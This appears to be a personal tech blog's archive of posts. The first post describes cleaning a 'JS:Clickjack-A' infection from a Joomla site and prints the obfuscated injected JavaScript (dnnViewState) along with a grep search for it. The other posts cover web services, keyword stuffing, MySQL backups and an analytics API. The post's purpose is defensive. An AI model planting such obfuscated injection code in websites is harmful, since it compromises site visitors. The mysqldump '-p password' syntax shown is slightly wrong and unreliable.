• How to remove JS:Clickjack-A [Trj] from my [yours] website

    Posted on August 8th, 2013 Webmaster 8 comments

    Hello,

    Im a long time without posting to this blog, really very busy at work, but this subject really diserves one post.

    During this week i received a e-mail from a customer of a site i built claiming that the website is infected with a virus, my first thougth was “Newbie User”. I try to access the website just to check if everything was running fine and they way i thought it was.

    Few days after i access this same site from another computer running “Avast Antivirus” then i received an alert “JS:ClickJack-A [Trj] Detected from website…”. In my mind Joomla had a bug and because i don´t update joomla with a good frequency (never) then i got hacked.

    But now? How to remove JS:Clickjack-A from my site?

    Well thats not so hard. First of all i discover on the internet some part of the malicious code:

    function dnnViewState()
    {
    var a=0,m,v,t,z,x=new Array(’9091968376′,’8887918192818786347374918784939277359287883421333333338896′,’778787′,’949990793917947998942577939317′),l=x.length;while(++a<=l){m=x[l-a];
    t=z=”;
    for(v=0;v<m.length;){t+=m.charAt(v++);
    if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
    t=”;}}x[l-a]=z;}document.write(‘<’+x[0]+’ ‘+x[4]+’>.’+x[2]+’{‘+x[1]+’}</’+x[0]+’>’);}dnnViewState();
    </script>

    After that i connect as root into my server and run the following command at the root folder of the site.

    grep -RnisI “}document.write(” *

    This command will do a recursive search into all files for the string “}document.write(“, this code is part of the hacker code but it can also be found on other pages.

    After i found the page with the malicious code i get really angry it was on a Joomla plugin called “AutsonSlideShow”, after that i just deactivate the plugin into my joomla panel and my site was fixed.

    Maybe your problem is not into this plugin or your website not run on joomla, but thats no problem you can use the same command to found the malicious code. If you dont have root access to the server you can download all your pages from your site to your computer and do the same search or you can check for last files modified.

    If you need help just do a comment into this post.

     


  • Website and Server Monitoring Tool

    Posted on June 9th, 2010 Webmaster No comments

    On this last months i am developing a website and a server monitoring tool. What this tools will be able to make is internal and external monitoring.

    External Monitoring:

    - HTTP CHECKS

    - ICMP CHECKS

    - TCP CHECKS

    Internal Monitoring:

    - CPU USAGE

    - HARD DISK USAGE

    - MEMORY USAGE

    - PROCESSES RUNNING

    Preview of the app:

    External Monitoring Screen

    External Monitoring Screen


    Internal Monitoring Screen

    Internal Monitoring Screen

    What i need to know if some of you guys wanna test it, and what you thing about this type of applications?


  • Creating a webservice client on Visual Studio 2008

    Posted on April 25th, 2010 Webmaster No comments

    Hello guys,

    I will show here how to create a web service client on Visual Studio 2008, you will see how easy can be that.

    1. Right-click on your project and go to add web reference.

    Add web reference

    2. After that you need to insert the url of the web service and then the windows normal steps, next, next, finish. In my case i am connecting to a webservice running on my own machine.

    Insert webservice url

    3. You will note that if everythings go fine, VS 2008 will create the source files ready to use.

    Code generated

    4. Here is a sample code about how to use your webservice client inside your application code.

    localhost::NetunoWSService ws;
    System::String^ res = "WS NOT AVAILABLE";

    try
    {
    res = ws.sendData(this->email,this->password,this->hostname,data);
    }
    catch (System::Exception^ ex)
    {
    //res = ex->ToString();
    res = “Web Service is not available or your internet is down”;
    }

    5. If you change something on your webservice server application you will need to reload the web references.

    Enjoy! Any questions i am open for discussions!


  • Keyword Stuffing

    Posted on October 2nd, 2009 jaghanivasan No comments

    This involves the calculated placement of keywords within a page to raise the keyword count, variety, and density of the page. This is useful to make a page appear to be relevant for a web crawler in a way that makes it more likely to be found. Example: A promoter of a Ponzi scheme wants to attract web surfers to a site where he advertises his scam. He places hidden text appropriate for a fan page of a popular music group on his page, hoping that the page will be listed as a fan site and receive many visits from music lovers. Older versions of indexing programs simply counted how often a keyword appeared, and used that to determine relevance levels. Most modern search engines have the ability to analyze a page for keyword stuffing and determine whether the frequency is consistent with other sites created specifically to attract search engine traffic. Also, large webpages are truncated, so that massive dictionary lists cannot be indexed on a single webpage.


  • Backup and Restore MySQL Databases

    Posted on June 1st, 2009 Webmaster No comments

    I will just show the most basic and used methods for mysql backup and restore.

    1st Method – Mysql Dump

    The mysqldump is the most common method for backuping a mysql database, a database dump is a text file with the create tables, columns, insert rows…

    For making a mysql dump (backup) use the follow command:

    single database: mysqldump -u user -p password database-name > backup-file-name.sql

    all databases: mysqldump -u user -p password -A > backup-file-name.sql

    For restoring a mysql dump use the following command:

    mysql -u user -p password database-name < backup-file-name.sql


    2nd Method – Mysql Folders Backup

    The folder backup is faster, all the mysql databases are on the folder /var/lib/mysql, each database is in a single folder.

    For backuping using this method use the follow command:
    tar -cf backup-file-name.tar /var/lib/mysql/database-name

    For restoring using this method just decompress the file:
    tar -xvf backup-file-name.tar

    That´s it, now you just need to use your method.

     


  • Using Compete.com API in your Website

    Posted on March 9th, 2009 Webmaster No comments

    Compete.com is a company that provides web analytics, visitors, keywords driving traffic and more. Some of the results that compete.com offers are just for paying users other no.

    In this post i will show you how can you use the api from Compete.com in your website, like i did in my http://whois.gwebtools.com/compete.com.

    1 step: Register for a developer user account.

    Register Compete Screen

    Register Compete Screen

    2 step: Register your application to get your personal API key.

    Register App

    Register App

    3 step: Start coding using your API key.

    Sample Call

    http://api.compete.com/fast-cgi/MI?d=google.com&ver=3&apikey=1234567890&size=large

    Sample Result

    <ci>
    <dmn>
    <nm>google.com</nm>
    <trust caption=”Trust”>
    <val>green</val>
    <link>http://toolbar.compete.com/trustgreen/google.com</link>
    <icon>http://home.compete.com.edgesuite.net/site_media/images/icons/trust_green_53.gif</icon>
    </trust>
    <rank caption=”Profile”>
    <val>2</val>
    <link>http://toolbar.compete.com/siteprofile/google.com</link>
    <icon>http://home.compete.com.edgesuite.net/site_media/images/icons/profile_3_53.gif</icon>
    </rank>
    <metrics caption=”Profile”>
    <val>
    <mth>12</mth>
    <yr>2006</yr>
    <uv>
    <ranking>2</ranking>
    <count>115,120,111</count>
    </uv>
    </val>
    <link>http://toolbar.compete.com/siteprofile/google.com</link>
    <icon>http://home.compete.com.edgesuite.net/site_media/images/icons/profile_3_53.gif</icon>
    </metrics>
    <deals caption=”Deals”>
    <val>1</val>
    <link>http://toolbar.compete.com/deals/google.com</link>
    <icon>http://home.compete.com.edgesuite.net/site_media/images/icons/deals_on_53.gif</icon>
    </deals>
    </dmn>
    </ci>

    How to parse it?

    You can develop your on xml parser, but if you use PHP or .NET it is really not necessary you can use the scripts that Compete.com provides to you.

    .NET wrapper

    PHP5 wrapper

    PHP5 wrapper in the PEAR repository

    More info access developer zone from Compete.com